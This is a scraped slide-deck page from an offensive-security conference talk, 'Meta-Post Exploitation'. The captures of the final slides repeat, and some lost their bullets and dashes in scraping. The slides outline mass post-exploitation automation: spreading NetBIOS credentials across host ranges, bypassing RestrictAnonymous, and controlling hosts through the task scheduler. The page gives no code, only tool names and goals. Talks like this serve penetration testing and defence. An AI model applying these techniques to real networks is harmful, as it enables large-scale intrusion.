  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 63: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 63

Massive Automation

Slide 64

Massive Automation

bull Automating techniques and tools for use against massive numbers of hosts

bull Goalsndash Penetrate as many systems as possible

with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack

Slide 65

Massive Automation

bull MassNetUse ndash Establish netbios session credentials on range of hosts

bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings

bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts

Slide 66

bull DEMOS

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 64: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 64

Massive Automation

bull Automating techniques and tools for use against massive numbers of hosts

bull Goalsndash Penetrate as many systems as possible

with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack

Slide 65

Massive Automation

bull MassNetUse ndash Establish netbios session credentials on range of hosts

bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings

bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts

Slide 66

bull DEMOS

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 65: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 65

Massive Automation

• MassNetUse – Establish NetBIOS session credentials on a range of hosts

• MassWinenum – Enumerate NetBIOS information, bypass certain RestrictAnonymous settings

• AtAbuse – Use the scheduler as your "shell" to control ranges of hosts

Slide 66

• DEMOS

Slide 67

• Related talks you should see
  – Beyond EIP – The theoretical tool development end of things (spoonm & skape)
  – Security Implications of Windows Access Tokens (Luke Jennings)

Slide 68

• Acknowledgements
  – Thanks to
    • All the people from the offensivecomputing, nologin and uninformed IRC and SILC channels
    • HD Moore especially, for support and mentorship
    • Danny Quist, krbklepto, Egypt, spoonm, skape
    • Luke Jennings for his awesome work

Slide 69

• Questions
• Presentation available at www.offensivecomputing.net
